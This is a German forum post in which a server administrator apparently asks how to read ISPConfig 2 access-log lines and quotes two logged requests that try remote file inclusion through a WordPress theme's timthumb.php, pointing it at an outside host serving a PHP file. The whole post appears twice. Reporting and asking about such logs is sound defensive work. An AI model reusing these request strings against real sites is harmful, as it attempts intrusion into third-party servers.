Hallo,
anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.
In den Logfiles finde ich:
web-ng:/var/log/httpd# grep taxo /var/log/httpd/ispconfig_access_log_2012_01_19
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:41 +0100] "GET /?q=taxonomy/term/4//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:43 +0100] "GET /?q=taxonomy/term//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
Ich benutze ISPConfig 2 (daher der Pfad zu der Logdatei)
Kann mir jemand erklären wie ich:
localhost||||1229||||78.46.75.84
deuten muss
also localhost scheint klar - dahinter die IP Adresse meines Servers
Aber die Zahl dazwischen kann ich nicht zuordnen!
anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.
In den Logfiles finde ich:
web-ng:/var/log/httpd# grep taxo /var/log/httpd/ispconfig_access_log_2012_01_19
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:41 +0100] "GET /?q=taxonomy/term/4//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:43 +0100] "GET /?q=taxonomy/term//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
Ich benutze ISPConfig 2 (daher der Pfad zu der Logdatei)
Kann mir jemand erklären wie ich:
localhost||||1229||||78.46.75.84
deuten muss
also localhost scheint klar - dahinter die IP Adresse meines Servers
Aber die Zahl dazwischen kann ich nicht zuordnen!